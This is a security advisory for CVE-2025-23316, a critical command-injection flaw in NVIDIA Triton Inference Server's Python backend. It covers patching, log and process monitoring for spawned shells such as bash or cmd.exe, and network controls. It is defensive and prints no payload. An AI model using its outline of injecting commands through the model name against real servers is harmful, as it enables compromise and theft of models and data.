CVE-2025-23316

NVIDIA · NVIDIA Triton Inference Server for Windows and Linux (Python Backend)

A critical vulnerability has been identified in the NVIDIA Triton Inference Server for both Windows and Linux, specifically within its Python backend.

Executive summary

A critical vulnerability has been identified in the NVIDIA Triton Inference Server for both Windows and Linux, specifically within its Python backend. This flaw allows a remote, unauthenticated attacker to execute arbitrary code on the server by sending a specially crafted request, potentially leading to a complete system compromise and theft of sensitive data or AI models.

Vulnerability

The vulnerability exists within the Python backend component of the NVIDIA Triton Inference Server. The server fails to properly sanitize the model name parameter in incoming requests. A remote, unauthenticated attacker can exploit this by crafting a request with a malicious model name string that includes arbitrary commands. When the server processes this request, the unsanitized input is executed on the underlying operating system with the privileges of the Triton server process, resulting in remote code execution (RCE).

Business impact

This vulnerability is rated as critical with a CVSS score of 9.8, posing a severe risk to the organization. A successful exploit could lead to a complete compromise of the affected inference server, allowing an attacker to execute arbitrary code. This could result in the theft of proprietary machine learning models and sensitive training data, disruption of critical AI-powered services, and the potential for the attacker to pivot and move laterally within the corporate network. The business could face significant financial losses, reputational damage, and loss of intellectual property.

Remediation

Immediate Action: Update NVIDIA Triton Inference Server for Windows and Linux to the latest version. Monitor for exploitation attempts and review access logs.

Proactive Monitoring:

Log Analysis: Review Triton Inference Server access logs for unusual or excessively long model name parameters, especially those containing special characters, shell commands, or script syntax.
Process Monitoring: Monitor for unexpected child processes being spawned by the Triton server process (e.g., sh, bash, powershell.exe, cmd.exe).
Network Traffic: Monitor for anomalous outbound network connections from the Triton server to unknown or untrusted IP addresses, which could indicate a successful compromise and command-and-control communication.

Compensating Controls:

Network Segmentation: Restrict network access to the Triton Inference Server. Use a firewall or network access control lists (ACLs) to ensure it is only accessible from trusted application servers and internal IP ranges.
Web Application Firewall (WAF): If the server is exposed, deploy a WAF with rules designed to inspect and block malicious patterns or command injection attempts within the model name parameter of API requests.
Principle of Least Privilege: Ensure the Triton server process runs as a low-privilege service account with minimal necessary permissions on the host system to limit the impact of a potential compromise.

Exploitation status

Public Exploit Available: false

Analyst recommendation

Given the critical severity (CVSS 9.8) of this remote code execution vulnerability, immediate action is required. Organizations using the affected NVIDIA Triton Inference Server versions should prioritize applying the vendor-supplied patches to all vulnerable systems without delay. Although this vulnerability is not currently listed on the CISA KEV catalog, its high potential for impact makes it an attractive target for threat actors. If immediate patching is not feasible, implement the recommended compensating controls and proactive monitoring to reduce the risk of compromise.